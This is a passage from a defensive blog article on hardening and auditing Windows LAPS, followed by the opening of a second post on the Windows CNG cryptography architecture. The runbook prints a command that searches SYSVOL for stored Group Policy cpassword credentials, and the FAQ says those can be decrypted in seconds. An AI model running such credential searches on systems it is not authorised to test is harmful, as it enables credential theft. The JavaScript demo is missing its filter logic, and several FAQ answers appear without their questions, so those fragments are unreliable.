`ADPasswordEncryptionEnabled`	`True` per Microsoft Learn's defaults table -- not off-by-default	`True`, configured explicitly so the choice is visible in policy audits and the DFL prerequisite is verified	same	The genuine failure mode is silent fallback to plaintext when DFL is below Server 2016 or `BackupDirectory` is not `2`, not a default-off bit	[@ms-laps-policy-settings; @ms-laps-csp]
`ADPasswordEncryptionPrincipal`	`Domain Admins` of the computer's domain when unspecified	Dedicated `LAPS-DPAPI-Decryptors` group, not Domain Admins	same, with PIM-gated activation	Decryption authority is delegated separately from LDAP read; minimise membership	[@ms-laps-concepts-overview]
`AdministratorAccountName`	empty (manages built-in RID 500)	empty on Server SKUs; named account (e.g. `lapsadmin`) on Client SKUs with the built-in disabled	On Win 11 24H2 / WS2025+, prefer Automatic Account Management with random name and disabled-by-default	Defeats predictable-RID-500 enumeration	[@ms-laps-policy-settings; @ms-laps-account-modes]
`ADBackupDSRMPassword`	`False`	n/a (member servers)	`True` on Domain Controllers	Brings DSRM-account management into LAPS scope -- a capability legacy LAPS never had	[@ms-laps-concepts-overview]

Tier-0 deviations from the tier-2 baseline are narrow but consequential. (a) `PasswordAgeDays` to 1 (AD) or 7 (Entra) caps the undetected-theft window. (b) `PostAuthenticationResetDelay` to 1 hour aggressively rotates after legitimate use. (c) `ADPasswordEncryptionPrincipal` to a dedicated decryptor group with PIM-gated activation [@ms-entra-pim] -- not standing membership. (d) `ADBackupDSRMPassword = True` only on DCs, so the Directory Services Restore Mode account is in LAPS scope. (e) `PasswordComplexity = 6` on accounts that a human must type under duress (DSRM, ESAE break-glass), `4` everywhere else. The tier-0 baseline is more expensive operationally -- daily rotation and 1-hour post-auth delay create a non-trivial volume of password reads through the decryption group -- and the cost is the entire point. Anything cheaper does not warrant the tier-0 label.

Note: The single most useful hardening move on a Windows LAPS deployment is to explicitly set ADPasswordEncryptionPrincipal to a dedicated group with minimum membership. Default = Domain Admins of the computer's domain is operationally correct (Domain Admins should be the readers of last resort) but architecturally lazy (most fleets do not want their DA group to be the routine LAPS-read group). Name the group something searchable -- LAPS-DPAPI-Decryptors is a defensible convention -- and put helpdesk LAPS-read permissions in that group, gated by Entra PIM activation [@ms-entra-pim] for non-emergency reads.

The audit-primitives sub-table

The decision of which tool answers which question is, in practice, the difference between a LAPS deployment that meets its goal and one that quietly does not. The five (and a half) primitives:

Primitive	Question it answers	Primary source
BloodHound `ReadLAPSPassword` edge	Which principals can read the LAPS password on which computer objects, transitively across the graph?	[@bloodhound-edge-readlaps]
PingCastle `A-LAPS-Not-Installed`	Does this domain have any LAPS solution installed for the native local administrator account?	[@pingcastle-rules]
PingCastle `A-LAPS-Joined-Computers`	Can a user who manually domain-joined a computer (via `mS-DS-CreatorSID` ownership) still read that computer's LAPS password?	[@pingcastle-rules]
PingCastle `A-PwdGPO`	Does this domain still have residual GPP `cpassword` artefacts in SYSVOL? (MITRE T1552.006)	[@pingcastle-rules; @mitre-t1552-006]
Windows event 4662 on `msLAPS-*` (SACL via `Set-LapsADAuditing`)	Who read which LAPS attribute on which computer object, and when?	[@ms-laps-set-adauditing; @ms-laps-ps-overview]
Entra audit log + Graph `GET /directory/deviceLocalCredentials/{deviceId}` reads	Who retrieved which LAPS password from Microsoft Entra ID (`BackupDirectory = 1`), and when?	[@ms-graph-localcredinfo; @ms-laps-entra-scenarios]

No Microsoft Defender for Identity alert in the current public taxonomy names LAPS specifically [@ms-defender-alerts]; instead, lean on the event 4662 SACL primitive plus advanced hunting in the IdentityDirectoryEvents table for principal-pattern anomalies. Microsoft's Compromised Credentials and Lateral Movement categories surface the downstream behaviour when a stolen LAPS password gets used.

{` // In production, run: Get-LapsADPassword -Identity * | Where-Object { // $.ExpirationTimestamp -lt (Get-Date) -or $.Source -eq 'Plaintext' // } // This in-browser demo mirrors the same logic against an array of mock computer objects.

const ONE_DAY_MS = 86400000; const computers = [ { name: "WS-001", msLapsExpiry: Date.now() + 5 * ONE_DAY_MS, encrypted: true }, { name: "WS-002", msLapsExpiry: Date.now() - 2 * ONE_DAY_MS, encrypted: true }, { name: "WS-003", msLapsExpiry: null, encrypted: false }, { name: "WS-004", msLapsExpiry: Date.now() + 1 * ONE_DAY_MS, encrypted: false }, ];

console.log(gaps.length === 0 ? "All computers have current, encrypted LAPS passwords" : "Coverage gaps:\n " + gaps.join("\n ")); `}

The AdministratorAccountName decision deserves one paragraph of its own. On Server SKUs, the built-in Administrator (RID 500) is enabled by default, and leaving the policy empty manages it -- this is what most deployments want. On Client SKUs the built-in is disabled by default; many shops create a named admin account (a common convention is lapsadmin) and set AdministratorAccountName to that name. On Windows 11 24H2 and Windows Server 2025 and later, the better answer is Automatic Account Management: set AutomaticAccountManagementEnabled = 1, AutomaticAccountManagementRandomizeName = 1, and AutomaticAccountManagementEnableAccount = 0, and the host will auto-create a randomised-name disabled-by-default local-admin account that Windows LAPS owns end to end [@ms-laps-account-modes]. The result is that an attacker enumerating local accounts cannot guess the LAPS-managed account name from RID 500, RID 1000, or any other predictable identifier.

This is the baseline. But LAPS is not the only answer to "who knows the local admin password." For three classes of fleet, the right answer is something else.

8. When LAPS Is Not the Right Tool

Three classes of fleet should not -- or should not only -- run Windows LAPS. The first wants a workflow LAPS does not offer. The second wants no standing local admin at all. The third is orthogonal: it changes the in-session elevation surface without changing the recoverable break-glass.

Third-party Privileged Access Management (PAM) vaults. Delinea Secret Server [@delinea-secretserver], CyberArk Endpoint Privilege Manager [@cyberark-epm], and BeyondTrust Password Safe are the dominant 2026 commercial offerings in the category. The case for running a PAM vault alongside (or instead of) Windows LAPS is rarely about cryptography and almost always about workflow. PAM vaults bring multi-factor authentication on checkout, full session recording, dual-approval gates for high-risk accounts, and cross-OS scope (Windows, macOS, Linux, network gear, hypervisors) under one ACL model. The total cost of ownership is higher than LAPS; the security model, properly deployed, is comparable. Many shops run both: Windows LAPS for the workstation floor, PAM for tier-0 break-glass with session recording. The split is a workflow trade-off, not an architectural one.

Zero standing local admin plus Entra PIM JIT elevation. Tier-0 fleets that have reached the "no routine local admin" architectural state disable the built-in RID 500 entirely and gate every admin operation through just-in-time elevation. Microsoft Entra Privileged Identity Management [@ms-entra-pim] supports the eligibility / activation / approval workflow at scale: an operator is eligible for an admin role, activates it for a bounded duration with optional MFA and ticket reference, and an approver signs off on the activation if policy requires. Windows LAPS coexists in this model as the absolute-last-resort break-glass mechanism -- for the case where Entra itself is down, the network is partitioned, and a human has to walk to a console and type a password. The architectural alignment is with MITRE T1078.001 (Default Accounts) [@mitre-t1078-001]: if the default account is permanently disabled and only re-enabled under PIM workflow, the entire technique class is bounded by the PIM activation log.

Windows 11 25H2 Administrator Protection. Per-elevation transient admin sessions arrived as a Tech Community preview in late 2025 [@tc-admin-protection-win11]. The feature creates a temporary, isolated "shadow admin" identity for the duration of each elevation prompt, brokering UAC-class elevation through a per-elevation token that is destroyed when the elevated process exits. This is orthogonal to LAPS, not a replacement. Administrator Protection addresses in-session UAC elevation; Windows LAPS addresses the recoverable break-glass password for off-network and non-bootable recovery. The two systems answer different questions. Conflating them produces designs that drop LAPS in favour of Administrator Protection and then discover, six months later, that there is no recovery primitive for a laptop the user has dropped off the corporate network for a year.

Situation	Recommended method
On-premises AD-joined, no Entra ID	A -- in-box Windows LAPS with AD backup
Microsoft Entra hybrid-joined, on-prem AD authoritative	A -- Microsoft's current hybrid recommendation
Pure Entra-joined, no on-prem AD	B -- in-box Windows LAPS with Entra ID backup
Stuck on Windows Server 2016 (excluded from Windows LAPS)	C -- legacy MSI LAPS until OS migration completes
In active migration from legacy LAPS to Windows LAPS	C in side-by-side mode with different managed accounts
Non-Windows scope (Linux, macOS, network gear) needs unified vaulting	D -- third-party PAM vault, often alongside A/B
Regulated industry requiring session recording / MFA checkout	D alongside A/B
Tier-0 fleet with a zero-standing-credential goal and Entra ID P2	E -- PIM-gated JIT elevation layered on A or B
Windows 11 fleet wanting in-session credential-theft mitigation	F -- Administrator Protection alongside A/B (orthogonal)
BYOD, workgroup, or unmanaged endpoints	None of A through F -- enrollment is the answer, not LAPS

flowchart TD Start["Local-admin password problem for a fleet"] BYOD{"BYOD or unmanaged?"} EnrollFirst["Enrollment is the answer, not LAPS"] Join{"AD-joined / hybrid / Entra-joined?"} WS2016{"Stuck on WS2016 or in migration?"} Tier0{"Tier 0 with zero-standing-credential goal?"} CrossOS{"Non-Windows scope or checkout workflow needed?"} WinElev{"Win 11 25H2 in-session elevation hardening?"} MA["Method A: Windows LAPS, AD backup"] MB["Method B: Windows LAPS, Entra backup"] MC["Method C: legacy MSI LAPS"] MD["Method D: PAM vault, alongside A/B"] ME["Method E: PIM-gated JIT, layered on A/B"] MF["Method F: Administrator Protection (orthogonal)"] Start --> BYOD BYOD -- yes --> EnrollFirst BYOD -- no --> Join Join -- AD or hybrid --> MA Join -- pure Entra --> MB MA --> WS2016 MB --> WS2016 WS2016 -- yes --> MC WS2016 -- no --> Tier0 Tier0 -- yes --> ME Tier0 -- no --> CrossOS CrossOS -- yes --> MD CrossOS -- no --> WinElev WinElev -- yes --> MF The terminology is genuinely confusing. *Microsoft Entra hybrid joined* is a device join state: the workstation is joined to both an on-premises AD domain and Microsoft Entra ID, and both directories know about it. *Microsoft Entra hybrid runbook worker*, by contrast, is an Azure Automation primitive that runs Automation runbooks on a worker process inside an on-premises environment. They share a word and nothing else. Windows LAPS policy for hybrid-*joined* devices is a `BackupDirectory` choice (typically AD for on-prem-authoritative hybrid fleets, Entra for Entra-authoritative); Hybrid runbook workers are an Azure Automation concern and entirely outside the LAPS scope.

All five answers above -- methods A through F -- have a structural ceiling. There is one bound none of them can break.

9. What LAPS Structurally Cannot Solve

Every recoverable-secret system has a privileged reader. Whether you call it ADPasswordEncryptionPrincipal, a "CyberArk vault admin," or a "PIM eligible approver," somebody can break the glass -- which means somebody can compromise the glass. This is a lower bound, not an implementation defect.

The eleven-year arc converged on a tight bound. It did not abolish the underlying problem. Four structural limits are worth naming, because each maps onto a real residual attack surface in 2026 deployments.

Bound 1: at least one reader exists, by construction. Symbolically, $|\text{readers}| \geq 1$. CNG DPAPI's group-key-protector substitution does not eliminate the privileged class; it relocates the trust boundary. The boundary moves from "every principal with LDAP read on the attribute" (legacy LAPS) to "every principal in the configured ADPasswordEncryptionPrincipal group at decryption time" (Windows LAPS). The relocation tightens the bound by orders of magnitude in typical fleets -- a LAPS-DPAPI-Decryptors group with five members beats an "All Extended Rights on the helpdesk OU" delegation with five hundred -- but it does not move the bound to zero. The directory that stores the LAPS secret remains a tier-0 asset, and the decryptor group remains a tier-0 principal class.

Every recoverable secret has a privileged reader. The architectural game is to make the reader class small, audited, time-bounded, and reachable from the directory only through Kerberos. The game is not to make the reader class empty. That game has no winning move.

Bound 2: the out-of-protocol OPSEC tail. Once a plaintext password leaves the directory -- pasted into a helpdesk ticket, screenshotted into a Slack DM, stored in a shared KeePass database that the team forgot to rotate -- the protocol's rotation knob is the only remaining mitigation. PostAuthenticationActions only fires after the next managed-account interactive logon [@ms-laps-policy-settings]; pre-logon exposure is bounded only by PasswordAgeDays. A password screenshotted into a chat log at 10:14 AM and never used is the password on that endpoint for the remainder of the configured rotation window, regardless of whether anyone has noticed the leak. The protocol does not, and cannot, solve "the password is now in a chat log."

Bound 3: unmanaged and BYOD endpoints. A machine that is neither AD-joined nor Microsoft Intune-managed has no LAPS policy applied to it. Personal-device BYO MAM scope is outside the LAPS protection model entirely. The fix for these endpoints is enrollment, not LAPS. A non-trivial portion of the residual local-admin-password risk in 2026 is concentrated on the long tail of unmanaged endpoints that exist precisely because management was politically or contractually infeasible. The protocol does not solve this; governance solves this.

Bound 4: verification asymmetry. The directory's audit log says what it chose to log. An unprivileged observer cannot verify enforcement from outside the directory. This is the structural ceiling that motivates external audit primitives -- PingCastle [@pingcastle-rules], BloodHound [@bloodhound-edge-readlaps], Defender for Identity [@ms-defender-alerts] -- because they sit outside the directory's own self-report. The bound cannot be closed inside the protocol; only an out-of-band attestation primitive can certify enforcement to a party that does not trust the directory.

Key idea: Somebody has to break the glass. The decryptor group is the new tier-0 asset; LAPS bounds the problem, it does not abolish it. The eleven-year arc was a convergence on a tighter bound, not an arrival at a clean answer. The right framing for the 2026 baseline is "the residual attack surface is now the actual attack surface, rather than an artefact of incomplete shipping." That is real progress -- it just is not closure.

A structurally tighter design would have three properties: threshold cryptography so no single principal can decrypt (an $m$-of-$n$ Shamir secret-sharing scheme over the password protector, with $m \geq 2$ in tier-0 fleets); attestation-bound retrieval so the decryptor's device state is part of the decryption policy (Azure Managed HSM's secure-key-release policy grammar [@ms-mhsm-policy-grammar] is the closest shipping primitive that approaches this -- a key-release decision conditioned on attestation claims like `x-ms-attestation-type` or `tee:sevsnpvm`); and a ledger-of-reads so every retrieval is recorded on a tamper-evident substrate that the directory itself cannot rewrite (Azure Confidential Ledger [@ms-conf-ledger] is the closest shipping primitive on the Microsoft side). None of these three are wired into Windows LAPS in 2026. Each exists as an adjacent Microsoft product. The architectural integration -- a Windows LAPS that requires two `LAPS-DPAPI-Decryptors` members to co-sign a retrieval, attests the retrieving device's state at decryption time, and writes the retrieval event to an append-only ledger the directory cannot edit -- is engineering work that nobody has shipped.

Some of those structural bounds map onto open problems with no clean 2026 answer. We close on six of them.

10. Open Problems in 2026

Six open problems in local-admin password management for which no first-party Microsoft answer ships in 2026. Each is one paragraph, framed as "what is the question," "what has been tried," and "what is the current best partial result."

Open question	What has been tried	Current best partial result
Legacy SYSVOL `cpassword` cleanup at scale	MS14-025 (UI disable, no remediation); PingCastle scanning; community `Get-GPPDeployedPasswords`	Third-party scan-and-manual-delete; no first-party cmdlet ships in the OS
Cross-tenant / cross-directory LAPS coverage report	Microsoft Intune compliance reports; manual `Get-LapsADPassword` and `Get-LapsAADPassword` joins	DIY KQL across two directories; no unified portal report
Hybrid-joined `BackupDirectory` ambiguity	Microsoft Learn guidance ("AD for hybrid")	Most shops configure both and reconcile downstream
Win 11 25H2 Administrator Protection and LAPS interaction	Tech Community guidance; Microsoft Learn architectural notes	Operate them as orthogonal, with no architectural integration
LDAP channel binding / signing enforcement migration	Microsoft KB4520412 enforcement push 2020-2024; cross-platform tool updates	Some Linux pentest tooling still incomplete; `bloodyAD` / `lapsv2decrypt` lead the field [@kb4520412-canonical]
Retrieval-event audit gap (cross-directory)	Event 4662 SACL via `Set-LapsADAuditing`; Entra audit log; Defender for Identity hunting	DIY KQL unification across AD + Entra; no unified audit pane

1. Legacy SYSVOL cpassword cleanup at scale. MS14-025 disabled new authoring twelve years ago; it never deleted what it patched [@ms14-025-bulletin]. No first-party Find-GPPPassword or Remove-GPPPassword cmdlet ships in the OS in 2026. PingCastle's A-PwdGPO rule and Semperis Purple Knight's equivalent scanner fill the gap [@pingcastle-rules]. The 2026 answer is: scan with a third-party tool, rotate the discovered credentials in whatever account-management primitive owns them, then delete the XML. The open question is why Microsoft has not shipped this in the twelve years since the bulletin. The blast-radius argument from 2014 -- "we cannot risk auto-deleting policy XMLs from SYSVOL" -- is now strictly weaker than the cleanup-tail argument that the residual artefacts keep showing up on internal pentest reports a decade later.

2. Cross-tenant and cross-directory LAPS coverage view. No portal-level "every Entra-joined and every AD-joined device that does not have a current LAPS password" report exists. Microsoft Intune compliance reports help on the Intune-managed side; Get-LapsADPassword -Identity * covers the AD side; Get-LapsAADPassword covers the Entra side. There is no single pane that unifies them. The 2026 answer is custom KQL or PowerShell that joins the three result sets on a normalised device identifier. The bottleneck is identity: Intune device IDs, AD objectGuid values, and Entra deviceId values are three different surrogate keys, and a fleet's mapping table is its own engineering investment.

3. Hybrid-joined BackupDirectory ambiguity. Microsoft Learn's current guidance is that hybrid-joined devices should typically use BackupDirectory = 2 (AD) when on-premises AD is the canonical identity store, and may use BackupDirectory = 1 (Entra) when Intune is the primary policy-delivery mechanism [@ms-laps-entra-scenarios]. In practice, the documentation hedges, and many shops configure both directions (one via GPO, one via Intune CSP) and rely on the per-device evaluation order to pick one. The result is a coverage-verification problem: a device that is "configured for AD backup" by GPO and "configured for Entra backup" by CSP can end up with the password in either backend, and the source of truth depends on policy precedence rules most operators do not memorise.

4. Windows 11 25H2 Administrator Protection and LAPS interaction. Administrator Protection's per-elevation transient admin tokens and Windows LAPS's recoverable break-glass password are operationally adjacent but architecturally disjoint [@tc-admin-protection-win11]. The documentation covers each feature on its own; the interaction matrix -- "what does a LAPS-managed RID 500 look like under Administrator Protection on a Win 11 25H2 host" -- is not laid out in one place. Tier-0 architects who want both behaviours have to assemble the answer from two product pages.

5. LDAP channel binding and signing enforcement migration. Microsoft has been hardening LDAP channel binding through a multi-year 2020-2024 enforcement push tracked under KB4520412 [@kb4520412-canonical]. The original March 10, 2020 update introduced Channel Binding Token (CBT) signing events 3039, 3040, and 3041; the manual enablement step was removed on November 14, 2023 for Windows Server 2022 and on January 9, 2024 for Windows Server 2019, after which the hardening became the default posture; starting with Windows Server 2022 23H2, all new versions ship with the full set of changes in the KB applied [@kb4520412-canonical]. Tooling that does not speak LDAPS-with-channel-binding will break when enforcement reaches its terminal state. Modern attack-graph tooling -- bloodyAD [@bloodyad-repo] and the lapsv2decrypt reference implementation [@lapsv2decrypt-repo] -- has tracked the changes. Not every Linux pentest stack has. Practitioners building Linux-based LAPS retrieval pipelines should validate their stack against the channel-binding-required posture before the enforcement wave reaches them.

6. The retrieval-event audit gap (cross-directory). Active Directory does not natively log every read of msLAPS-EncryptedPassword; Set-LapsADAuditing installs a SACL that emits Directory Service event 4662 for configured attribute reads [@ms-laps-set-adauditing]. Microsoft Entra ID logs LAPS retrieval through its own audit log, surfaced via the Graph endpoint [@ms-graph-localcredinfo]. The two log streams have different schemas, different timestamp normalisations, and different principal identifiers. Cross-pane unification of "who read which LAPS password when" across both backends is a DIY engineering problem in 2026. Microsoft Defender for Identity surfaces some of the AD-side reads under the Compromised Credentials and Lateral Movement categories [@ms-defender-alerts] but does not name LAPS specifically in the public alert taxonomy.

The threshold-cryptography open problem (an $m$-of-$n$ Shamir scheme over the LAPS password protector, with $m \geq 2$ in tier-0 fleets) is theoretically closed by the 1979 Shamir secret-sharing construction. The deployment-side block is that no Microsoft-shipped primitive wires the construction to the LAPS rotation pipeline. Adjacent shipping primitives (Azure Managed HSM key-release [@ms-mhsm-policy-grammar], Azure Confidential Ledger [@ms-conf-ledger]) exist on the Azure side, but the integration with on-premises LAPS clients is not on any public roadmap. The companion posts on DPAPI internals (#20) and Defender for Identity (#87) cover adjacent territory but do not close this gap.

None of those six dissolves the architectural lesson the eleven-year arc taught: the right defaults take a decade to ship. Here is the practitioner field manual for the meantime.

11. Practitioner Field Manual and FAQ

What follows is a seven-step deployment list, three named sidebars that surface the most common misconceptions, and a seven-question FAQ. Lift the step list verbatim into your deployment runbook; the sidebars exist because the article would not be defensible without them.

The audit-and-migrate seven-step list

Audit SYSVOL for cpassword first. Run PingCastle's A-PwdGPO (MITRE T1552.006) [@pingcastle-rules; @mitre-t1552-006] before touching anything else. A Windows triage one-liner -- findstr /s /i cpassword \\domain\SYSVOL\*.xml -- will land on most environments in under a minute. Remediate the discovered XML files (rotate the underlying account passwords, then delete the XMLs) before deploying Windows LAPS so the attack surface and the defence are not co-evolving in the same window.
Extend the AD schema for Windows LAPS. Run Update-LapsADSchema once per forest from a Domain Admin context. The cmdlet is idempotent and coexists with the legacy ms-Mcs-AdmPwd attribute on the same Computer object [@ms-laps-mig-scenarios].
Delegate. Run Set-LapsADComputerSelfPermission on each target OU so that computer accounts can write their own msLAPS-* attributes. Audit existing "All Extended Rights" delegations with Find-LapsADExtendedRights and remove any that do not have an explicit operational justification [@ms-laps-ps-overview]. This is the legacy-LAPS lesson applied to the new attribute set.
Configure encryption-at-rest. Verify that the forest's Domain Functional Level is Windows Server 2016 or higher. Configure ADPasswordEncryptionEnabled = 1 explicitly even though the default is True -- the explicit configuration makes the choice visible in policy audits and forces the operator to verify the DFL prerequisite [@ms-laps-policy-settings]. Assign ADPasswordEncryptionPrincipal to a dedicated LAPS-DPAPI-Decryptors group, not Domain Admins [@ms-laps-concepts-overview].
Deploy policy. GPO for AD-joined, Intune CSP for Entra-joined and hybrid-joined [@ms-laps-csp]. Settings as per section 7's baseline table. Validate via Get-LapsADPassword -Identity <computer> against a representative sample of hosts after the first one-hour rotation timer has fired [@ms-laps-get-adpassword].
Migrate from legacy LAPS. Use the documented coexistence pattern: the legacy MSI's CSE keeps running against the built-in RID 500, the new in-box LAPS takes over against a named secondary local-admin account, then retire the legacy ms-Mcs-AdmPwd schema readers and uninstall the MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The legacy MSI's installation is blocked on Windows 11 23H2 and later [@ms-laps-msi-download].
Continuous audit. PingCastle for coverage rules (A-LAPS-Not-Installed, A-LAPS-Joined-Computers, and the GPP A-PwdGPO) [@pingcastle-rules]; BloodHound for the ReadLAPSPassword edge across the graph [@bloodhound-edge-readlaps]; Defender for Identity for downstream behaviour under Compromised Credentials and Lateral Movement [@ms-defender-alerts]; and a custom KQL on the Entra audit log for LapsPasswordRetrieved events. None of these is optional in a deployment that intends to detect compromise.

Sidebar A: MS16-072 is NOT the LAPS attribute-readability bulletin

A recurring misattribution credits MS16-072 / KB3163622 / CVE-2016-3223 (June 14, 2016) [@ms16-072-bulletin; @ms16-072-kb; @cve-2016-3223] with closing the legacy LAPS attribute-readability issue. It does not. MS16-072 is a Group Policy retrieval-context fix: it moved user-side GPO fetch into the computer's security context to defeat a man-in-the-middle class on policy traffic. The actual LAPS attribute-readability issue -- "All Extended Rights" delegations silently including CONTROL_ACCESS on the CONFIDENTIAL ms-Mcs-AdmPwd attribute -- has no Microsoft-assigned CVE or bulletin. The canonical write-up is Sean Metcalf's August 2016 ADSecurity piece [@adsec-laps-2016], and the operational primitive is SpecterOps's ReadLAPSPassword BloodHound edge [@bloodhound-edge-readlaps].

Sidebar B: "Hybrid joined" is not "Hybrid Worker"

Microsoft Entra hybrid joined devices are workstations joined to both an on-premises AD domain and Microsoft Entra ID. The LAPS conversation about hybrid joined is a BackupDirectory choice. Microsoft Entra hybrid runbook workers, on the other hand, are an Azure Automation primitive -- worker processes that execute Automation runbooks against on-premises resources. They share a word and nothing else. A LAPS policy targeted at "hybrid devices" means hybrid joined; it has nothing to do with hybrid runbook workers. The article's section 8 includes the same disambiguation because operators conflate them with surprising frequency.

Sidebar C: How GPP cpassword still gets found in 2026

MS14-025 disabled new authoring but did not delete the artefacts [@ms14-025-bulletin]. The artefacts persist because SYSVOL replication is conservative -- nothing in the forest's design deletes anything from SYSVOL just because the editor UI was hot-patched on the administrative workstation. A fresh PingCastle scan against a long-lived forest will routinely surface 2010-era Groups.xml files [@pingcastle-rules], and the third-party scanner cohort is the only practical defence. The one-shot remediation pattern is: find with A-PwdGPO, rotate the underlying password via the replacement tool (Windows LAPS for built-in local admin; a PAM vault for service accounts that were stored in GPP), then delete the Groups.xml and let SYSVOL replication propagate the deletion.

No. Administrator Protection addresses in-session UAC-class elevation by brokering each elevation through a per-elevation transient shadow-admin identity [@tc-admin-protection-win11]; it does not provide a recoverable break-glass password for an off-network or non-bootable endpoint. The two systems are orthogonal and Microsoft recommends running them together on Windows 11 25H2 fleets. Replacing LAPS with Administrator Protection produces designs that lose the recovery primitive for laptops that have wandered off the corporate network for a year. Defence in depth, plus a coverage-leak primitive. An LDAP reader who is not in `ADPasswordEncryptionPrincipal` gets only an opaque ciphertext blob [@ms-laps-concepts-overview] -- but the same reader can still enumerate which computer objects have a current `msLAPS-EncryptedPassword`, which gives them target-selection telemetry on managed-versus-unmanaged hosts. The canonical write-up of this class is Sean Metcalf's August 2016 ADSecurity piece on the legacy `ms-Mcs-AdmPwdExpirationTime` attribute [@adsec-laps-2016], and the architectural lesson carries forward to Windows LAPS unchanged. Yes, in seconds. The 32-byte AES-256-CBC key is published verbatim in `[MS-GPPREF]` section 2.2.1.1.4 of Microsoft's Open Specifications corpus [@ms-gppref-aes-key] and that publication is permanent under the Open Specifications Promise. Any residual `Groups.xml` (or five sibling carriers including the asymmetric `Printers.xml` [@rewtdance-gpp-2012]) in SYSVOL that contains a `cpassword` attribute is operationally plaintext. The 2026 answer is to find them with PingCastle's `A-PwdGPO` rule [@pingcastle-rules] and remediate -- not to expect the artefacts to expire on their own. No. The rotation cycle is the `PasswordAgeDays` interval (default 30 days, minimum 1 on AD backup, minimum 7 on Entra backup) [@ms-laps-policy-settings]. After authentication, `PostAuthenticationActions` (default `3` = reset + sign out) fires once the `PostAuthenticationResetDelay` window (default 24 hours) has elapsed. Value `11` (Windows 11 24H2 / Server 2025+) adds termination of remaining processes; it is *not* a forced shutdown without warning -- the standard two-minute warning still applies and SMB sessions are deleted. Yes. LAPS rotates the password on a disabled account; the account simply cannot be used to log on until it is enabled. The break-glass runbook is: enable the account, retrieve the LAPS password, perform the recovery, rotate immediately, re-disable. On Windows 11 24H2 and Windows Server 2025 and later, Microsoft's recommendation is to enable Automatic Account Management with a randomised name and `AutomaticAccountManagementEnableAccount = 0` so the managed account ships disabled-by-default with a non-predictable name [@ms-laps-account-modes]. The pattern defeats predictable-RID-500 enumeration entirely. Microsoft Entra ID. With `BackupDirectory = 1` [@ms-laps-policy-settings], the local LAPS component posts the rotated password to the `deviceLocalCredentials` resource on the Entra device object via Microsoft Graph [@ms-graph-localcredinfo]. Retrieval is via `Get-LapsAADPassword` (a wrapper around the Graph endpoint), the Microsoft Entra portal Devices blade, or a direct `GET /directory/deviceLocalCredentials/{deviceId}` call [@ms-laps-entra-scenarios]. Read permission requires the Cloud Device Administrator or Intune Service Administrator Entra role. No. `CanReadGMSAPassword` is the edge for **Group Managed Service Accounts** -- a different Active Directory feature with a different ACL on a different attribute (`msDS-GroupMSAMembership`). The correct LAPS edge is **`ReadLAPSPassword`**, introduced in BloodHound 2.0 on August 7, 2018 [@specterops-bh2], and the current edge documentation covers both the legacy `ms-Mcs-AdmPwd` and the modern `msLAPS-*` attribute paths [@bloodhound-edge-readlaps].

The companion posts in this series cover Pass-the-Hash itself (#76), DPAPI internals (#20), Microsoft Entra Privileged Identity Management (#90), Active Directory tiering (#72), Microsoft Defender for Identity (#87), and BloodHound (#77). Each of those is referenced in this article at the point where the topic would otherwise demand a digression; each has its own deep treatment elsewhere.

Twenty years. Eleven years of which separated Microsoft's December 2012 articulation of the architecture from the April 11, 2023 in-box default [@ms-pth-whitepaper; @tc-windows-laps-ga-2023]. Four residual attack surfaces -- delegated-decryptor compromise, the pre-rotation OPSEC tail, BYOD endpoints, and the multi-decade MS14-025 cleanup tail [@ms14-025-bulletin] -- still resist the architecture rather than fall to it. One through-line: this is what shipping the right default a decade late looks like. The right defaults are now in the box. The directory is still tier 0. Somebody still has to break the glass. The architectural game from here is not to invent a new generation; it is to make sure the one we finally have is actually deployed, audited, and clean.

CNG Architecture: BCrypt, NCrypt, KSPs, and How Windows Picks Its Algorithms

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Since Windows Vista, every piece of cryptography in Windows -- TLS, BitLocker, Authenticode, Windows Hello, DPAPI -- flows through the **Cryptography API: Next Generation (CNG)**. CNG splits the world into two layers. **BCrypt** does primitives: AES, SHA, HMAC, RNG, key derivation. **NCrypt** routes calls to a **Key Storage Provider (KSP)** that owns the long-lived private keys: software, TPM, smart card, or a third-party HSM. Algorithm selection is governed by a registered provider-priority list, the Schannel cipher-suite order, and a single FIPS-mode toggle that flips Windows into its validated subset. Windows 11 24H2 added the first post-quantum primitives (ML-KEM, ML-DSA) to the same surface, with no API break. This article walks through how that machine works, why Microsoft designed it that way, and where it leaks.

1. From CAPI to CNG: why Microsoft started over

In the late 1990s, Microsoft shipped its first general cryptographic API. The original Cryptographic Service Providers (CAPI) model [@learn-microsoft-com-service-providers] arrived in Windows NT 4.0 Service Pack 4 in 1998 and defined a plug-in unit called a Cryptographic Service Provider, or CSP. A CSP was a monolithic DLL: it owned the algorithm implementations, the key storage, and the export-control posture all at once. If you wanted to add hardware-backed RSA on Windows NT, you wrote a CSP. If you wanted to add a new hash function, you also wrote a CSP. The model worked for the algorithms Microsoft had in mind when it designed it.

Then the algorithms changed.

AES was standardized in 2001, after CAPI's design was already frozen. Microsoft retrofitted AES into the original architecture by shipping the Microsoft Enhanced RSA and AES Cryptographic Provider [@learn-microsoft-com-cryptographic-provider] as a separate CSP, sitting alongside the original Microsoft Base Cryptographic Provider. Elliptic-curve cryptography was even more awkward: CAPI's algorithm identifiers and key-blob formats had no place for ECC curves. Every new algorithm required a new CSP or a new release of an existing one. The plug-in surface was rigid, the FIPS validation story was painful, and the API was relentlessly C-shaped in ways that made auditing hard.Microsoft was not alone. The same era produced Intel's Common Data Security Architecture (CDSA) [@en-wikipedia-org-os-2] and several short-lived crypto frameworks for OS/2 and other platforms. Most of them disappeared. CAPI's longevity owed more to Windows market share than to its design.

By 2005, Microsoft started over. The result was the Cryptography API: Next Generation, or CNG, which shipped with Windows Vista and Windows Server 2008 in January 2007 [@learn-microsoft-com-cng-portal]. CNG was not a refactor. It was a clean second system, designed from a different set of assumptions: algorithms would keep arriving, key storage needed to be a separate concern, FIPS validation had to be a first-class output, and the same API had to work in user mode and kernel mode.

The Windows cryptographic API introduced in Vista (2007) as the long-term replacement for CAPI. CNG splits cryptography into a primitives layer (`bcrypt.h`, `bcryptprimitives.dll`) and a key-storage layer (`ncrypt.h`, `ncrypt.dll`), each pluggable through registered providers. Used by every modern Windows component that touches cryptography. The plug-in unit of the legacy CAPI architecture (1998-onward). A CSP bundled algorithms, key storage, and FIPS posture into a single DLL. Largely superseded by CNG providers, but still present on the system for backwards compatibility.

